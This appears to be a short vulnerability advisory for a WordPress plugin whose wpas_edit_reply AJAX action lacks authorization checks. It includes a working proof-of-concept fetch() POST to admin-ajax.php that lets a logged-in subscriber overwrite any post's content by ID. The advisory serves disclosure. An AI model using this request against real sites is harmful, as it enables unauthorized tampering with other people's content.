Description The plugin does not correctly authorize the wpas_edit_reply function, allowing users to edit posts for which they do not have permission.
Log in as a subscriber and run the following code in the browser, setting the reply_id to any post ID. fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded” }, “body”: new URLSearchParams({“action”: “wpas_edit_reply”, “reply_id”: “1”, “reply_content”: “hello”}), “method”: “POST”, “credentials”: “include” });